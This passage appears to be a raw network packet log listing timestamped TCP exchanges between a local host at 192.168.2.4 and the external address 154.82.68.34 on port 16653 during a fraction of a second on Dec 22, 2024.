                                      Dec 22, 2024 08:37:05.479120016 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.479120016 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.479168892 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.481261015 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.481318951 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.481422901 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.481482983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.612447023 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.612530947 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.612606049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.612662077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.613234043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.613302946 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.613399982 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.614903927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.614969015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.615041971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.615096092 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.616626024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.616689920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.616767883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.616826057 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.618206978 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.618267059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.618288994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.618340015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.619887114 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.619947910 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.620022058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.620079041 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.621553898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.621624947 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.621701956 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.621762991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.623236895 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.623292923 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.623378992 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.623435020 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.624880075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.624936104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.625359058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.625416040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.626534939 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.626584053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.626656055 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.626717091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.628256083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.628314018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.628402948 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.628459930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.630059004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.630120993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.630171061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.630220890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.631557941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.631630898 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.631666899 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.631716967 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.633330107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.633367062 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.633392096 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.633421898 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.634864092 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.634933949 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.634993076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.635050058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.636580944 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.636645079 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.636696100 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.636744022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.638210058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.638264894 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.638330936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.638381958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.640129089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.640183926 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.640229940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.640281916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.641696930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.641755104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.641843081 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.641910076 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.643513918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.643570900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.643644094 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.643707037 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.645019054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.645054102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.645075083 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.645097971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.646768093 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.646835089 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.646884918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.646939039 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.648267031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.648319006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.648323059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.648365021 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.649872065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.649931908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.650005102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.650059938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.651534081 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.651595116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.651674986 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.651736021 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.653294086 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.653351068 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.653395891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.653450012 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.654875994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.654927015 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.654948950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.654982090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.656577110 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.656637907 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.656656981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.656711102 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.658202887 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.658265114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.658288002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.658350945 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.659864902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.659924030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.659996033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.660074949 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.661519051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.661583900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.661617994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.661669016 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.663192034 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.663250923 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.663352966 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.663407087 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.664844990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.664904118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.664993048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.665045977 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.666591883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.666640997 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.666645050 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.666691065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.668231010 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.668298006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.668389082 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.668442965 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.669928074 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.669981956 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.669989109 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.670028925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.671530008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.671590090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.671654940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.671715021 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.673163891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.673219919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.673293114 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.673350096 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.674858093 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.674911976 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.674952984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.675005913 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.676491976 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.676551104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.676637888 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.676707983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.678162098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.678217888 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.678301096 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.678356886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.679861069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.679913044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.679913998 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.679960966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.681570053 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.681628942 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.681695938 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.681752920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.683176994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.683249950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.683278084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.683342934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.684819937 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.684886932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.684940100 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.684993982 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.686700106 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.686757088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.686886072 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.686940908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.688189983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.688247919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.688319921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.688375950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.689820051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.689878941 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.689937115 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.689990044 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.691467047 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.691531897 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.691581011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.691637993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.693146944 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.693207026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.693268061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.693324089 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.694797039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.694854975 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.694919109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.694977045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.696476936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.696551085 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.696624994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.696686983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.698215008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.698270082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.698318005 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.698395967 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.699851990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.699907064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.699944019 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.700140953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.701494932 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.701555014 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.804672003 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.804764986 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.804866076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.804938078 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.805480957 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.805531979 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.805552006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.805603981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.806963921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.807023048 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.807111025 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.807159901 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.808478117 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.808537006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.808609009 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.808659077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.810018063 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.810070038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.810077906 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.810122967 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.840236902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.840328932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.840346098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.840405941 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.840795040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.840857029 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.840958118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.841011047 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.842118979 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.842178106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.842631102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.842700005 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.842705965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.842761040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.843955994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.844014883 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.844055891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.844113111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.845308065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.845366001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.845448017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.845506907 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.846678972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.846739054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.846750975 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.846807957 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.847971916 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.848037958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.848109961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.848161936 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.849353075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.849387884 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.849409103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.849443913 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.850652933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.850713968 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.850743055 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.850800991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.852042913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.852104902 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.852191925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.852252007 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.853384972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.853457928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.853467941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.853519917 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.854741096 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.854775906 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.854803085 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.854835033 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.856034040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.856092930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.856229067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.856281996 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.857357025 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.857414961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.857477903 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.857534885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.858695984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.858755112 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.858843088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.858905077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.860074043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.860130072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.860141993 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.860199928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.861388922 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.861449003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.861504078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.861560106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.862772942 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.862831116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.862895012 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.862951040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.864072084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.864125013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.864128113 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.864172935 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.865436077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.865495920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.865557909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.865614891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.866760969 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.866818905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.866883039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.866940022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.868125916 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.868179083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.868184090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.868227959 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.869461060 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.869537115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.869565964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.869621992 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:05.870821953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:05.870872974 CET1665349730154.82.68.34192.168.2.4
